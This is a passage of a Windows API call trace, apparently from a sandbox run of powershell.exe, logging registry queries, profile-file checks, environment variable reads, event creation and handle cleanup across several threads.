	[0867.250] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2d5150
	[0868.650] VirtualQuery (in: lpAddress=0x1cbad0, lpBuffer=0x1cc990, dwLength=0x30 | out: lpBuffer=0x1cc990*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0870.813] CoTaskMemAlloc (cb=0x104) returned 0x2d5260
	[0870.813] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d5260, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0870.813] CoTaskMemFree (pv=0x2d5260) 
	[0870.815] CoTaskMemAlloc (cb=0x104) returned 0x2d5260
	[0870.815] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d5260, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0870.815] CoTaskMemFree (pv=0x2d5260) 
	[0870.825] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cdbd8 | out: phkResult=0x1cdbd8*=0x39c) returned 0x0
	[0870.825] RegQueryValueExW (in: hKey=0x39c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cdb5c, lpData=0x0, lpcbData=0x1cdb58*=0x0 | out: lpType=0x1cdb5c*=0x1, lpData=0x0, lpcbData=0x1cdb58*=0x56) returned 0x0
	[0870.826] CoTaskMemAlloc (cb=0x5a) returned 0x1b8efdb0
	[0870.826] RegQueryValueExW (in: hKey=0x39c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cdb2c, lpData=0x1b8efdb0, lpcbData=0x1cdb28*=0x56 | out: lpType=0x1cdb2c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cdb28*=0x56) returned 0x0
	[0870.826] CoTaskMemFree (pv=0x1b8efdb0) 
	[0870.826] RegCloseKey (hKey=0x39c) returned 0x0
	[0870.826] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cdbd8 | out: phkResult=0x1cdbd8*=0x39c) returned 0x0
	[0870.826] RegQueryValueExW (in: hKey=0x39c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cdb5c, lpData=0x0, lpcbData=0x1cdb58*=0x0 | out: lpType=0x1cdb5c*=0x1, lpData=0x0, lpcbData=0x1cdb58*=0x56) returned 0x0
	[0870.826] CoTaskMemAlloc (cb=0x5a) returned 0x1b8efdb0
	[0870.826] RegQueryValueExW (in: hKey=0x39c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cdb2c, lpData=0x1b8efdb0, lpcbData=0x1cdb28*=0x56 | out: lpType=0x1cdb2c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cdb28*=0x56) returned 0x0
	[0870.827] CoTaskMemFree (pv=0x1b8efdb0) 
	[0870.827] RegCloseKey (hKey=0x39c) returned 0x0
	[0870.831] CoTaskMemAlloc (cb=0x20c) returned 0x1b8e0300
	[0870.831] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b8e0300 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0870.833] CoTaskMemFree (pv=0x1b8e0300) 
	[0870.833] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1cd790, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0870.833] CoTaskMemAlloc (cb=0x20c) returned 0x1b8e0300
	[0870.833] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b8e0300 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0870.833] CoTaskMemFree (pv=0x1b8e0300) 
	[0870.833] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1cd790, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0870.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1cd930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0870.836] SetErrorMode (uMode=0x1) returned 0x1
	[0870.836] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cdb40 | out: lpFileInformation=0x1cdb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0870.836] SetErrorMode (uMode=0x1) returned 0x1
	[0870.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1cd930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0870.836] SetErrorMode (uMode=0x1) returned 0x1
	[0870.837] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cdb40 | out: lpFileInformation=0x1cdb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0870.837] SetErrorMode (uMode=0x1) returned 0x1
	[0870.837] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1cd930, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0870.837] SetErrorMode (uMode=0x1) returned 0x1
	[0870.837] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cdb40 | out: lpFileInformation=0x1cdb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0870.837] SetErrorMode (uMode=0x1) returned 0x1
	[0870.837] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1cd930, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0870.837] SetErrorMode (uMode=0x1) returned 0x1
	[0870.837] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cdb40 | out: lpFileInformation=0x1cdb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0870.838] SetErrorMode (uMode=0x1) returned 0x1
	[0870.840] CoTaskMemAlloc (cb=0x104) returned 0x2d5260
	[0870.840] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d5260, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0870.840] CoTaskMemFree (pv=0x2d5260) 
	[0870.842] CoTaskMemAlloc (cb=0x104) returned 0x2d5260
	[0870.842] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d5260, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0870.842] CoTaskMemFree (pv=0x2d5260) 
	[0870.844] CoTaskMemAlloc (cb=0x104) returned 0x2d5260
	[0870.844] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d5260, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0870.844] CoTaskMemFree (pv=0x2d5260) 
	[0870.847] CoTaskMemAlloc (cb=0x104) returned 0x2d5260
	[0870.847] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d5260, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0870.847] CoTaskMemFree (pv=0x2d5260) 
	[0870.854] CoTaskMemAlloc (cb=0x104) returned 0x2d5260
	[0870.854] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d5260, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0870.854] CoTaskMemFree (pv=0x2d5260) 
	[0870.856] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x318
	[0870.856] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x308
	[0870.856] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a0
	[0870.856] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x328
	[0870.856] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x32c
	[0870.856] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x330
	[0870.856] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x334
	[0870.856] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x338
	[0870.856] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x33c
	[0870.856] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x340
	[0870.856] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x344
	[0870.856] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a4
	[0871.109] CoTaskMemAlloc (cb=0x104) returned 0x2d5260
	[0871.109] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d5260, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0871.109] CoTaskMemFree (pv=0x2d5260) 
	[0871.111] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0871.111] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x1cdd20 | out: lpMode=0x1cdd20) returned 1
	[0871.112] CoTaskMemAlloc (cb=0x104) returned 0x2d5260
	[0871.112] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d5260, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0871.112] CoTaskMemFree (pv=0x2d5260) 
	[0871.115] SetEvent (hEvent=0x328) returned 1
	[0871.116] SetEvent (hEvent=0x318) returned 1
	[0871.116] SetEvent (hEvent=0x308) returned 1
	[0871.116] SetEvent (hEvent=0x3a0) returned 1
	[0871.117] CoTaskMemAlloc (cb=0x104) returned 0x2d5260
	[0871.117] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d5260, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0871.118] CoTaskMemFree (pv=0x2d5260) 
	[0871.118] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cda78 | out: phkResult=0x1cda78*=0x358) returned 0x0
	[0871.118] RegQueryValueExW (in: hKey=0x358, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x1cd9fc, lpData=0x0, lpcbData=0x1cd9f8*=0x0 | out: lpType=0x1cd9fc*=0x0, lpData=0x0, lpcbData=0x1cd9f8*=0x0) returned 0x2

Thread:
	id = 846
	os_tid = 0x1780


Thread:
	id = 860
	os_tid = 0x140c


Thread:
	id = 1192
	os_tid = 0x1918


Thread:
	id = 1195
	os_tid = 0x1904


Thread:
	id = 1228
	os_tid = 0x1be8


Thread:
	id = 1275
	os_tid = 0x1cc8


Thread:
	id = 1276
	os_tid = 0x1ccc

	[0647.074] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0782.620] RegCloseKey (hKey=0x30c) returned 0x0
	[0782.620] RegCloseKey (hKey=0x308) returned 0x0
	[0782.620] RegCloseKey (hKey=0x304) returned 0x0
	[0804.718] LocalFree (hMem=0x227250) returned 0x0
	[0804.718] RegCloseKey (hKey=0x318) returned 0x0
	[0804.718] LocalFree (hMem=0x227300) returned 0x0
	[0804.718] CloseHandle (hObject=0x308) returned 1
	[0804.719] CloseHandle (hObject=0x13) returned 1
	[0804.719] CloseHandle (hObject=0xf) returned 1
	[0817.529] RegCloseKey (hKey=0x308) returned 0x0
	[0863.638] RegCloseKey (hKey=0x374) returned 0x0
	[0863.639] RegCloseKey (hKey=0x3b0) returned 0x0
	[0863.639] RegCloseKey (hKey=0x390) returned 0x0
	[0863.639] RegCloseKey (hKey=0x38c) returned 0x0
	[0863.639] RegCloseKey (hKey=0x388) returned 0x0
	[0863.640] RegCloseKey (hKey=0x384) returned 0x0
	[0863.640] RegCloseKey (hKey=0x380) returned 0x0
	[0863.640] RegCloseKey (hKey=0x37c) returned 0x0
	[0863.640] RegCloseKey (hKey=0x378) returned 0x0
	[0863.641] RegCloseKey (hKey=0x350) returned 0x0
	[0863.641] RegCloseKey (hKey=0x3ac) returned 0x0
	[0863.641] RegCloseKey (hKey=0x3a8) returned 0x0
	[0863.641] RegCloseKey (hKey=0x370) returned 0x0
	[0863.642] RegCloseKey (hKey=0x36c) returned 0x0
	[0863.642] RegCloseKey (hKey=0x368) returned 0x0
	[0863.642] RegCloseKey (hKey=0x364) returned 0x0
	[0863.642] RegCloseKey (hKey=0x360) returned 0x0
	[0863.643] RegCloseKey (hKey=0x35c) returned 0x0
	[0863.643] RegCloseKey (hKey=0x358) returned 0x0
	[0863.643] RegCloseKey (hKey=0x354) returned 0x0
	[0863.643] RegCloseKey (hKey=0x3a4) returned 0x0
	[0863.644] RegCloseKey (hKey=0x344) returned 0x0
	[0863.644] RegCloseKey (hKey=0x340) returned 0x0
	[0863.644] RegCloseKey (hKey=0x33c) returned 0x0
	[0863.644] RegCloseKey (hKey=0x338) returned 0x0
	[0863.645] RegCloseKey (hKey=0x334) returned 0x0
	[0863.645] RegCloseKey (hKey=0x330) returned 0x0
	[0863.645] RegCloseKey (hKey=0x32c) returned 0x0
	[0863.646] RegCloseKey (hKey=0x328) returned 0x0
	[0863.646] RegCloseKey (hKey=0x3a0) returned 0x0
	[0863.646] RegCloseKey (hKey=0x318) returned 0x0
	[0863.646] RegCloseKey (hKey=0x308) returned 0x0
	[0863.646] RegCloseKey (hKey=0x39c) returned 0x0
	[0863.647] RegCloseKey (hKey=0x398) returned 0x0
	[0897.774] RegCloseKey (hKey=0x358) returned 0x0
	[0924.492] CertFreeCRLContext (pCrlContext=0x1b90e2f0) returned 1
	[0924.493] CloseHandle (hObject=0x4b4) returned 1
	[0924.493] CloseHandle (hObject=0x4b0) returned 1
	[0924.495] CertFreeCRLContext (pCrlContext=0x1b90e370) returned 1
	[0924.496] CloseHandle (hObject=0x460) returned 1
	[0924.496] CloseHandle (hObject=0x45c) returned 1
	[0924.497] CertFreeCRLContext (pCrlContext=0x1cdcf760) returned 1
	[0924.498] CloseHandle (hObject=0x408) returned 1
	[0924.498] CloseHandle (hObject=0x404) returned 1
	[0924.499] CertFreeCRLContext (pCrlContext=0x1b90e2f0) returned 1
	[0924.499] CloseHandle (hObject=0x394) returned 1
	[0924.500] CloseHandle (hObject=0x374) returned 1
	[0924.500] CloseHandle (hObject=0x3b0) returned 1
	[0924.500] CloseHandle (hObject=0x390) returned 1
	[0924.501] CloseHandle (hObject=0x38c) returned 1
	[0924.501] CloseHandle (hObject=0x380) returned 1
	[0924.502] CertFreeCRLContext (pCrlContext=0x1cdcf7e0) returned 1
	[0924.502] CloseHandle (hObject=0x37c) returned 1
	[0924.502] CloseHandle (hObject=0x4c4) returned 1
	[0924.502] CloseHandle (hObject=0x378) returned 1
	[0924.503] CloseHandle (hObject=0x350) returned 1
	[0924.503] CloseHandle (hObject=0x3ac) returned 1
	[0924.504] CloseHandle (hObject=0x370) returned 1
	[0924.504] CloseHandle (hObject=0x3a8) returned 1
	[0924.505] CertCloseStore (hCertStore=0x1b93ef40, dwFlags=0x0) returned 1
	[0924.505] CloseHandle (hObject=0x358) returned 1

Thread:
	id = 1291
	os_tid = 0x1d30


Thread:
	id = 1887
	os_tid = 0x252c

	[0871.421] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0871.427] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0871.435] CoTaskMemAlloc (cb=0x104) returned 0x2d5260
	[0871.435] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d5260, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0871.435] CoTaskMemFree (pv=0x2d5260) 
	[0871.437] VirtualQuery (in: lpAddress=0x1c8bdca0, lpBuffer=0x1c8beb60, dwLength=0x30 | out: lpBuffer=0x1c8beb60*(BaseAddress=0x1c8bd000, AllocationBase=0x1bf30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0871.443] CoTaskMemAlloc (cb=0x104) returned 0x2d5260
	[0871.443] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d5260, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0871.443] CoTaskMemFree (pv=0x2d5260) 
	[0871.445] CoTaskMemAlloc (cb=0x104) returned 0x2d5260
	[0871.445] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d5260, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0871.446] CoTaskMemFree (pv=0x2d5260) 
	[0871.450] CoTaskMemAlloc (cb=0x104) returned 0x2d5260
	[0871.450] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d5260, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0871.450] CoTaskMemFree (pv=0x2d5260) 
	[0871.752] CoTaskMemAlloc (cb=0x104) returned 0x2d5260
	[0871.752] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d5260, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0871.752] CoTaskMemFree (pv=0x2d5260) 
	[0871.755] CoTaskMemAlloc (cb=0x104) returned 0x2d5260
	[0871.755] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d5260, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0871.755] CoTaskMemFree (pv=0x2d5260) 
	[0871.756] CoTaskMemAlloc (cb=0x104) returned 0x2d5260
	[0871.756] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d5260, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0871.757] CoTaskMemFree (pv=0x2d5260) 
	[0871.761] VirtualQuery (in: lpAddress=0x1c8bdf50, lpBuffer=0x1c8bee10, dwLength=0x30 | out: lpBuffer=0x1c8bee10*(BaseAddress=0x1c8bd000, AllocationBase=0x1bf30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0871.763] CoTaskMemAlloc (cb=0x104) returned 0x2d5260
	[0871.763] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d5260, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0871.763] CoTaskMemFree (pv=0x2d5260) 
	[0871.766] CoTaskMemAlloc (cb=0x104) returned 0x2d5260
	[0871.766] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d5260, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0871.766] CoTaskMemFree (pv=0x2d5260) 
	[0871.766] CoTaskMemAlloc (cb=0x104) returned 0x2d5260
	[0871.766] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d5260, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0871.766] CoTaskMemFree (pv=0x2d5260) 
	[0871.768] CoTaskMemAlloc (cb=0x104) returned 0x2d5260
	[0871.768] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d5260, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0871.768] CoTaskMemFree (pv=0x2d5260) 
	[0871.780] CoTaskMemAlloc (cb=0x104) returned 0x2d5260
	[0871.780] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d5260, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0871.780] CoTaskMemFree (pv=0x2d5260) 
	[0873.114] CoTaskMemAlloc (cb=0x104) returned 0x2d5260
	[0873.114] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d5260, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0873.114] CoTaskMemFree (pv=0x2d5260) 
	[0873.116] CoTaskMemAlloc (cb=0x104) returned 0x2d5260
	[0873.116] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d5260, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0873.116] CoTaskMemFree (pv=0x2d5260) 
	[0873.118] CoTaskMemAlloc (cb=0x104) returned 0x2d5260
	[0873.118] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d5260, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0873.118] CoTaskMemFree (pv=0x2d5260) 
	[0873.169] CoTaskMemAlloc (cb=0x104) returned 0x2d5260
	[0873.169] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d5260, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0873.169] CoTaskMemFree (pv=0x2d5260) 
	[0873.170] CoTaskMemAlloc (cb=0x104) returned 0x2d5260
	[0873.170] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d5260, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0873.171] CoTaskMemFree (pv=0x2d5260) 
	[0873.172] CoTaskMemAlloc (cb=0x104) returned 0x2d5260
	[0873.172] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d5260, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0873.172] CoTaskMemFree (pv=0x2d5260) 
	[0873.174] CoTaskMemAlloc (cb=0x104) returned 0x2d5260
	[0873.174] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d5260, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0873.174] CoTaskMemFree (pv=0x2d5260) 
	[0873.195] CoTaskMemAlloc (cb=0x104) returned 0x2d5260
	[0873.195] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d5260, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0873.195] CoTaskMemFree (pv=0x2d5260) 
	[0874.473] CoTaskMemAlloc (cb=0x104) returned 0x2d5260
	[0874.473] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d5260, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0874.473] CoTaskMemFree (pv=0x2d5260) 
	[0874.477] CoTaskMemAlloc (cb=0x104) returned 0x2d5260
	[0874.477] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d5260, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0874.477] CoTaskMemFree (pv=0x2d5260) 
	[0874.482] CoTaskMemAlloc (cb=0x104) returned 0x2d5260
	[0874.482] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d5260, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0874.482] CoTaskMemFree (pv=0x2d5260) 
	[0874.485] CoTaskMemAlloc (cb=0x104) returned 0x2d5260
	[0874.485] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d5260, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0874.485] CoTaskMemFree (pv=0x2d5260) 
	[0898.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c8bd920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0898.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c8bd820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0898.542] CoTaskMemAlloc (cb=0x20c) returned 0x1b8e1b10
	[0898.542] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b8e1b10, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0898.542] CoTaskMemFree (pv=0x1b8e1b10) 
	[0898.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c8bd980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0898.556] GetCurrentProcess () returned 0xffffffffffffffff
	[0898.556] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8bd8e8 | out: TokenHandle=0x1c8bd8e8*=0x358) returned 1
	[0898.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x1c8bd540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30
	[0898.562] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c8bd990 | out: lpFileInformation=0x1c8bd990*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0898.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c8bd4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
